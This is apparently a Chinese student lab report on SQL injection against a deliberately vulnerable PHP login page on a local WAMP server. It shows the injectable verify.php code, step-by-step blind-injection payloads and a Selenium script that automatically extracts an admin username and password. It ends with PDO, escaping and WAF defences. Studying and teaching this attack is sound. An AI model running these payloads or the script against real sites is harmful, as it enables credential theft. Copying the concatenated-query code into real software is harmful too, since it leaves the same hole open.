文章目录

  • 一、实验目的
  • 二、实验准备
  • 三、实验内容
  • 四、WAMP服务器搭建步骤
    • 1. 安装wamp,启动所有服务,“start all services”
    • 2. 通过phpmyadmin,新建数据库test,创建admin管理员账号表,并添加相应的账户名和密码
    • 3. 将login.php和verify.phpf放入wamp的www文件夹
  • 五、SQL注入的详细步骤
    • 1. 验证存在SQL注入漏洞
    • 2. 接下来可以猜测管理员帐号表
    • 3. 接下来猜测表中字段
    • 4. 接下来确定用户名的长度
    • 5. 接下来确定用户名
    • 6. 确定用户名对应的密码
  • 六、意外情况
    • 1. sqli与sql不同
    • 2. 同时有多个用户名都满足要求
  • 七、源码及运行结果
  • 八、防范SQL注入的方案
    • 1.代码层面
    • 2. 网络层面

一、实验目的

通过 SQL 注入攻击,掌握网站的工作机制,认识到 SQL 注入攻击的防范措施,加强对 Web 攻击的防范。

二、实验准备

(1)了解网站的运行机制和原理。

(2)了解 asp、php、jsp 或者 asp.net 语言的工作原理。

(3)熟悉数据库 SQL 语言。

(4)在 Internet 上搜索 SQL 注入的相关文章,学习 SQL 注入的原理和方法。

三、实验内容

通过模拟 SQL 注入攻击获得某网站后台登陆密码。

(1)通过本地服务器搭建模拟网站。

(2)测试其是否存在SQL注入漏洞,进行模拟攻击。

(3)获得后台数据库中的存储网站用户和密码的数据表。

(4)获得其中一对用户名和密码。

(6)用获得的用户名和密码验证是否能够登陆。

(7)为这个网站的SQL注入漏洞提出解决方案和防范方法。

(8)使用seleium库撰写python爬虫脚本,自动获取SQL管理员的用户名和密码。

四、WAMP服务器搭建步骤

1. 安装wamp,启动所有服务,“start all services”

2. 通过phpmyadmin,新建数据库test,创建admin管理员账号表,并添加相应的账户名和密码

3. 将login.php和verify.phpf放入wamp的www文件夹

其中login.php如下:

<html><head><title>Sql注入演示</title><meta http-equiv="content-type" content="text/html;charset=utf-8"></head><body ><form action="verify.php" method="post"><fieldset ><legend>Sql注入演示</legend><table><tr><td>用户名:</td><td><input type="text" name="username"></td></tr><tr><td>密  码:</td><td><input type="text" name="password"></td></tr><tr><td><input type="submit" value="提交"></td><td><input type="reset" value="重置"></td></tr></table></fieldset></form></body>
</html>

verify.php如下:

<html><head><title>登录验证</title><meta http-equiv="content-type" content="text/html;charset=utf-8"></head><body>
<?php$conn=@mysql_connect('127.0.0.1:3306','root','') or die("数据库连接失败!");mysql_select_db("test",$conn) or die("您要选择的数据库不存在");//修改成数据名,此处为test$name=$_POST['username'];$pwd=$_POST['password'];$sql="select * from admin where username='$name' and password='$pwd'";//修改成表名,此处为users$query=mysql_query($sql);$arr=mysql_fetch_array($query);if(is_array($arr)){echo "<script>alert('登录成功')</script>";}else{echo "您的用户名或密码输入有误,<a href=\"login.php\">请重新登录!</a>";}
?></body>
</html>

浏览器打开http://localhost/login.php即可看到登录页面。

五、SQL注入的详细步骤

1. 验证存在SQL注入漏洞

用户名输入’ or 1=1#密码无论输入什么,均可以正确登陆:

原因是sql语句变成了:select * from admin where username=’’ or 1=1#’ and password=‘123’,任意数据库的记录都满足该条件,因此arr是有效的。

输入’ and 1=1# 会返回账号错误,但是不会报错退出,因为sql语句仍然是有效的。

以上步骤确定了数据库存在SQL注入漏洞,并可以通过此漏洞进行用户名密码的获取。

2. 接下来可以猜测管理员帐号表

用户名填' or exists (select * from admin)#

SQL语句变成:select * from admin where username='' or exists (select * from admin)#'...如果登陆成功,说明数据库中确实有对应的admin表格,而且很有可能是管理员帐号表。

在此列举可能的管理员账号表用于猜测:name_list = ['admin', 'admins', 'account', 'adminInfo', 'user', 'users', 'userInfo']

' and exists (select * from admin)# 也可以用来猜测,如果没有出现如下图的异常,说明数据库中确实有对应的表名

3. 接下来猜测表中字段

根据已有的表名admin进行猜测其可能有的字段,一般的管理员表格都是通过id, username, password来登陆的。

输入' and exists (select id from admin) #没有异常,即:select * from admin where username='' and exists (select id from admin)#' ... 可以执行,说明数据库中确实有id字段

同样的,可以猜测有password, username两个字段

4. 接下来确定用户名的长度

以下其他信息的获取与上面有所不同。因为使用查询不存在的表名与字段名,SQL语句均会报错,而查询不存在的用户名与密码时,SQL语句只会返回空的结果,于是exits语句返回为False。页面正常但返回用户名错误,只有将exist前的and换为or才能分辨两者的区别。

' or exists (select id from admin where id=4) # 选择可能存在的id号,能够正确登陆。

' or exists (select id from admin where length(username)<6 and id=4) # 用于猜测对应的用户名长度范围(可用2分法)

' or exists (select id from admin where length(username)=5 and id=1) # 用于精确猜测对应的用户名长度

5. 接下来确定用户名

' or 4=(select id from admin where mid(username,1,1)='d')# 截取用户名的第一位,猜测对应的值,相当于以下sql语句:

select * from admin where username='' and 4=(select id from admin where mid(username,1,1)='d')# ...

其中mid(username,1,1)表示截取username从第1位开始长度为1 的部分,即用户名的第一位,同样试出对应的第二位(mid(username,2,1))到第五位,是david,可用填入以下验证:

' or 1=(select id from admin where username='david')

6. 确定用户名对应的密码

同样的可以通过对应的id号码试出密码:anekeyzzz456。于是得到了后台的一个用户名和密码。

六、意外情况

1. sqli与sql不同

verify.php中$conn=@mysql_connect('127.0.0.1:3306','root','') or die("数据库连接失败!");若使用mysqli_connect就会出以下问题:

并不是因为数据库不存在,而是根本就没有正确连上数据库。经过修改以后,输入数据库中存在的admin/password能够正确登陆。

2. 同时有多个用户名都满足要求

我们尝试select * from admin where username='' or 4=(select id from admin where mid(username,1,1)='d')#时,如果首字母开头为d的用户名有两个,则sql语句发生错误:

因为一个不可能与两个相等,这时,我们必须要设置id是后面的子集才能成功。所以使用到in:

七、源码及运行结果

使用python的selenium库进行自动化爬虫,按照以上步骤进行自动化尝试。

import timefrom selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.chrome.options import Optionsclass Webber:interval = 0chrome_options = Options()chrome_options.add_argument('--headless')alpha_dict = [chr(x) for x in list(range(97, 123))+list(range(65,91))+list(range(48,58))]def __init__(self, url):self.url = urlself.driver = webdriver.Chrome()self.driver.get(url)def get_path(self):try:return self.driver.find_element_by_name('username')except:return self.driver.find_element_by_name('user_login')def login(self):self.driver.find_element_by_xpath('/html/body/form/fieldset/table/tbody/tr[3]/td[1]/input').click()def alert_is_present(self):  # 弹窗代表登陆成功,否则进入异常或错误页面。注意返回正常登陆页面try:alert = self.driver.switch_to.alertalert.accept()return Trueexcept NoAlertPresentException:return Falsefinally:self.roll_back()def roll_back(self):self.driver.back()time.sleep(web.interval)def try_value(self, value):self.get_path().clear()self.get_path().send_keys(value)time.sleep(web.interval)self.login()time.sleep(web.interval)return self.alert_is_present()def get_table_name(self):name_list = ['admin', 'admins', 'account', 'adminInfo', 'user', 'users', 'userInfo']for name in name_list:if self.try_value("' or exists (select * from " + name + ")#"):return namereturn Nonedef try_field_name(self, table, field):return self.try_value("' or exists (select " + field + " from " + table + ")#")def get_field_name(self, table):field_list = ['id', 'username', 'password', 'user_login', 'user_password']list_ = []for field in field_list:if self.try_field_name(table, field):list_.append(field)print("fields in table are: " + str(list_))return list_def has_id(self, table, id):return self.try_value("' or exists (select id from " + table + " where id=" + id + ")#")# 尝试用户名的长度 [m,M] 之间def try_field_length(self, table, id, m, M, field):return self.try_value("' or exists (select id from " + table + " where id=" + id + " and length("+field+")>=" + str(m) + " and length("+field+")<=" + str(M) + ")#")def get_field_length(self, table, id, field):m = 0M = 100assert self.try_field_length(table, id, m, M, field)while m < M:print(m, M)mid = int((m+M)/2)if self.try_field_length(table, id, m, mid, field):M = midelse:m = mid + 1assert m == Mreturn mdef try_field_i(self, table, id, i, field):for t in Webber.alpha_dict:if self.try_value("' or "+id+" in (select id from "+table+" where mid("+field+","+str(i)+",1)='"+t+"')#"):return traise Exception("no such alpha!")def get_field(self, table, id, length, field):field_str = ""for i in range(1, length+1):print(i, end=': ')ch = self.try_field_i(table, id, i, field)print(ch)field_str += chreturn field_strif __name__ == '__main__':web = Webber('http://localhost/login.php')time.sleep(web.interval)# 1. 验证存在SQL注入漏洞'if not web.try_value("' or 1=1#"):print("this website doesn't have sql")else:# 2. 接下来可以猜测管理员帐号表table = web.get_table_name()assert tableprint('table name is: ' + table)# 3. 接下来猜测表中字段assert {'id', 'username', 'password'} <= set(web.get_field_name(table))# 4. 接下来确定用户名的长度# 下面以 id =4 为例尝试其用户名与密码assert web.has_id(table, '4')l = web.get_field_length(table, '4', 'username')print("length of username(4) is: " + str(l))# 5. 接下来确定用户名username = web.get_field(table, '4', l, 'username')print("username(4) is: " + username)# 6. 确定用户名对应的密码l = web.get_field_length(table, '4', 'password')print("length of password(4) is: " + str(l))password = web.get_field(table, '4', l, 'password')print("password(4) is: " + password)

运行结果如下:运行代码进行暴力尝试,运行大概1分钟,获取了id=4对应的用户名 david以及密码anekeyzzz456

table name is: admin
fields in table are: ['id', 'username', 'password']
0 100
0 50
0 25
0 12
0 6
4 6
4 5
length of id(4) is: 5
1: d
2: a
3: v
4: i
5: d
username of id(4) is: david
0 100
0 50
0 25
0 12
7 12
10 12
length of id(4) is: 12
1: a
2: n
3: e
4: k
5: e
6: y
7: z
8: z
9: z
10: 4
11: 5
12: 6
password of id(4) is: anekeyzzz456

八、防范SQL注入的方案

1.代码层面

当数据库对用户在客户端的输入字符或语句不加限制的读取到并执行时,就产生了sql注入漏洞,自然的当数据库对客户端的输入进行了相关的限制和过滤后,使用预处理和参数化,sql注入的风险会大大降低。

利用sql自身所带的转义函数,可以把获取到的客户端语句进行相应的转义。

当然也可以进行过滤,既然测试者在构造payload时需要相关的字符,那将这些字符过滤掉确实是一种方法(当绝不是最好的,因为数据库的更新换代导致字符绝不是一层不变的。)

2. 网络层面

自然是使用相应的安全设备,例如WAF设备启用防SQL Inject注入策略,云端防护(著名的阿里云盾)等

至于什么是好的方法,这里展示专业人员推荐的方法

PDO即统一的数据库访问接口。它可以防止前端传进来的参数被拼接到sql语句的情况。

正如上图所示,它会将前端输入的参数用占位符“?”来代替,并把这条语句结果先和数据库进行交付,再传参。而不是一起传进去。也就避免了不加节制的拼接前端语句

既然网站服务器存在sql注入漏洞,测试者可以通过相关payload来遍历数据,那在客户端和web 服务之间架一堵防火墙也不失为一种好的方法。一旦访问中存在恶意的字符就会被阻断掉。当然防火墙的设置并不代表后台服务器就允许存在sql注入漏洞,这两者是一种动态的关系需要同时推进。

通过SQL注入获得网站后台用户密码相关推荐

  1. holdpwd php,PHPMyWind后台管理界面的SQL注入漏洞 - 网站安全

    后台管理界面因为过滤不严格导致SQL注入漏洞,可以使权限较低的管理员取得较高权限,以及获取并修改超级管理员的用户名密码. 存在问题的代码,admin_save.php 59-101行,SQL语句中的$ ...

  2. 老网站后台管理密码找出

    老板突然让把老网站加个产品,我用FTP下载后,发现后台管理是慧谷动力的,于是找了下管理目录是ssadmin,里面默认页是index.html,打开后,表单指向adminpass.asp,是它验证在用户 ...

  3. SQL注入闭合方式及万能密码

    由万能公式想到的... 请求方式 GET请求 POST请求 SQL注入闭合方式 数字型 字符型 再看sqli-labs实验 万能密码 请求方式 两种 HTTP 请求方法:GET 和 POST 在客户机 ...

  4. SQL注入点判断及万能密码

    目录 SQL注入漏洞的类型 1.数字型判断 2.字符型判断 SQL注入--万能密码 SQL注入漏洞的类型 1.单引号判断 http://www.xxx.com/xxx.asp?id=10' 如果出现错 ...

  5. 网站后台万能密码/10大常用弱口令

    方法 / 步骤 一: 手动探测 先手动猜测几个可能的弱口令,主要是判断站点有没有做登录失败次数限制,若没有限制,则可以使用工具字典工具进行测试 二: 使用字典测试 2.1 字典生成思路 国内很多安全测 ...

  6. jieqi(杰奇)cms v1.6 php代码执行0day漏洞,杰奇CMS (=1.7) SQL注入漏洞 - 网站漏洞 - iick's blog...

    杰奇CMS ( Jieqi CMS) 是一套以小说系统为主的CMS,目前的最新版本是1.7,在小说类的站中使用率还是比较高的,这几天花了点时间看了一下他的代码,觉得挺有意思的,跟大家分享一下. 整个系 ...

  7. 管理员密码的php文件,ecshop网站后台管理员密码找回办法

    define('IN_ECS', true); require(dirname(__FILE__) . '/includes/init.php'); $admin_name=trim($_REQUES ...

  8. 网站后台——用户上传图片剪切

    https://segmentfault.com/a/1190000012818387 JQuery 插件图片裁剪插件cropper.js使用,上传,后台怎么处理 https://blog.csdn. ...

  9. SQL注入 | 黑客入门篇(如何绕过密码登陆账号)

    SQL注入详解 什么是SQL注入 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击, 而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登陆甚至篡改数据库. SQL注入 ...

  10. 网站安全测试与检测中 发现的OA系统中的SQL注入漏洞

    近日,SINE安全监测中心监控到泛微OA系统被爆出存在高危的sql注入漏洞,该移动办公OA系统,在正常使用过程中可以伪造匿名身份来进行SQL注入攻击,获取用户等隐私信息,目前该网站漏洞影响较大,使用此 ...

最新文章

  1. 最后两天-微生物组-宏基因组分析(线上/线下同时开课,2020最后一期)
  2. 洛谷P3953 逛公园
  3. 对语句 cv::Point2f srcPoint[3];的理解~
  4. Geany 代码自动补齐功能设置
  5. 这个让人看跪了的设计!实力证明,数学才是世界的最终boss!
  6. 使用mysql制作学生成绩单_【实例讲解】快速制作学生成绩单
  7. 深度学习与自然语言处理
  8. mysql 格式化_mysql中格式化数字详解
  9. 虚拟机变更网卡MAC地址后的网络连接
  10. 理解Lucene中的Query
  11. pyinstaller cx_oracle,使用pyinstaller打包使用cx_Oracle模块的程序出现The specified module could not be found的问题...
  12. DSP28335加密及解密
  13. 渗透之——SQLMap参数说明
  14. 1015: C基础-同因查找
  15. 04 分布式文件系统以及MapReduce入门程序
  16. PyEcharts 基本图表之雷达图
  17. php redis 批量读取,PHP redis 批量操作
  18. 2019云栖大会:逍遥看巅峰,张勇提“百新”,平头哥“再亮剑”
  19. JavaScript数组方法三板斧,100%的开发都得知道
  20. redis反序列化报错解决

热门文章

  1. [RK3566] 通过GM8775 点LVDS屏调试记录
  2. Hou的图像显著性计算模型
  3. 计算机防止检查清理软件吗,清除电脑垃圾用什么软件好 如何预防电脑卡顿
  4. 每日英语--Week6
  5. springboot 问卷调查系统
  6. 『软件工程7』详解软件项目管理之风险分析与管理
  7. R语言学习笔记9_多元统计分析介绍
  8. Ubuntu18.04安装GPU显卡驱动
  9. 黑php的称呼,这三个称呼你都说对了吗?
  10. 《深入理解计算机系统》第七章学习笔记